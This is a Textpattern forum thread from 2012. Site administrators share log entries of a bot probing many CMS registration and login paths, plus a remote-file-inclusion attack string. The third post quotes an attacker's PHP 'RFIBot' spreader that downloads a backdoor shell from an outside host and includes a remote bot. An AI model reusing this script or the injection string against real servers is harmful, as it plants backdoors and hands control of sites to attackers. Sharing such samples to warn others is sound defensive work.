Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

#1 2012-10-29 05:22:27

colak
Admin
From: Cyprus
Registered: 2004-11-20
Posts: 9,090
Website GitHub Mastodon Twitter

Just to say I'm glad I am using txp

here is part of my site’s log from last night (newer on top). The particular hacker first thought that we had a wp site and started from there. As the txp admin interface is not showing in the logs I wonder if they ended up trying to actually log in.

/index.php?app=home&mod=public&act=register 	  	 
/index.php?app=home&mod=public&act=register 	  	 
/signup/ 	  	 
/tools/quicklogin.one 	  	 
/register.php 	  	 
/reg.asp 	  	 
/reg.asp 	  	 
/logging.php?action=login 	  	 
/index.php 	  	 
/register.php 	  	 
/login.php 	  	 
/login.php 	  	 
/login.php 	  	 
/login.php?action=quit 	  	 
/bokeindex.asp 	  	 
/Members.aspx 	  	 
/reg.asp 	  	 
/?T=reg 	  	 
/register.php 	  	 
/register.cgi 	  	 
/member/index_do.php?fmdo=user&dopost=regnew 	  	  	 
/register.aspx 	  	 
/member.php?mod=logging&action=login 	  	 
/member.php?mod=register 	  	 
/post.php 	  	 
/register.php?type=company 	  	 
/member/register.php?type=company 	  	 
/member.php/register.php?type=company 	  	 
/register.php?type=company 	  	 
/member/register.php?type=company 	  	 
/member.php/register.php?type=company 	  	 
/register.php 	  	 
/reg.php 	  	 
/login.php 	  	 
/CreateUser.asp 	  	 
/member/ 	  	 
/Class/Post.asp 	  	 
/reg.asp 	  	 
/login.php?part=register 	  	 
/User/Register.aspx 	  	 
/modules.php?app=user_reg 	  	 
/member.php?mod=logging&action=login 	  	 
/member.php?mod=register 	  	 
/CreateUser.asp 	  	 
/wp-signup.php 	  	 
/signup.php 	  	 
/index.php?do=/user/register/ 	  	 
/?do=%2Fuser%2Fregister%2F 	  	 
/index.php?page=en_Signup 	  	 
/signup.php 	  	 
/profile.php?mode=register&agreed=true&coppa=0 	  	 
/register.php 	  	 
/ucp.php?mode=register
/index.php?app=core&module=global&section=login 	  	 
/index.php?act=Login&CODE=00 	  	 
/signup.php 	  	 
/user/register 	  	 
/signup/ 	  	 
/account/register.php 	  	 
/index.php?action=register 	  	 
/join.php 	  	 
/blogs/load/recent 	  	 
/join.php 	  	 
/join_form.php 	  	 
/signup 	  	 
/signup 	  	 
/join.php 	  	 
/index.php?p=member/signup 	  	 
/signup.php 	  	 
/YaBB.cgi/ 	  	 
/YaBB.pl/ 	  	 
/member/register 	  	 
/register/ 	  	 
/signup.php 	  	 
/signup.php 	  	 
/index.php?site=register 	  	 
/?site=register 	  	 
/register.php 	  	 
/member/join.php
/index.php?page=blogs
/register/
/tiki-register.php 	  	 
/signup 	  	 
/?s=Register 	  	 
/Register/ 	  	 
/wp-login.php?action=register

Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.

Offline

#2 2012-10-29 16:11:13

etc
Developer
Registered: 2010-11-11
Posts: 5,192
Website GitHub

Re: Just to say I'm glad I am using txp

Dear hackers, this sucks too: /?​_SERVER[DOCUMENT_ROOT]=http://​www.​star-​games.​be/​images/​test.​jpg?​%0D?

Offline

#3 2012-10-29 21:32:13

etc
Developer
Registered: 2010-11-11
Posts: 5,192
Website GitHub

Re: Just to say I'm glad I am using txp

Funny day, another guy is trying to feed me with

<html><style>
body {font:10pt tahoma;color:#ff0000;background:black;margin:4;font-weight:bold;}
</style><body>
<?php
###[ MQ SPREAD for RFIBot (2.3) ]###
error_reporting(0);
##### CONFIG #####
$mode = $_GET["mode"]; 

$url = 'http://bleury.fr/id/'; //URL path
$src = $url.'cmd'; //Source Shell
$shell = 'ini.php'; //Backdoor PHPShell name
$bot = $url.'bot'; //Source PHPBot

##### SPREAD #####
switch ($mode) {
case "bot":
include($bot);
break;
default:
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);
if(file_exists($exec)){
$exec=array(@getcwd().DIRECTORY_SEPARATOR,$shell);
$exec=implode("",$exec);}
if(!copy($src,$exec)){
die(base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Failed!'); //encode biar lebih optimal!
}
else {
echo base64_decode('TWNOIFNoZWxsOiA=').''.$exec.' Created!'; //encode biar lebih optimal!
}
break;
}
?>
</body></html>
<?php die(); ?>

Offline

Board footer

Powered by FluxBB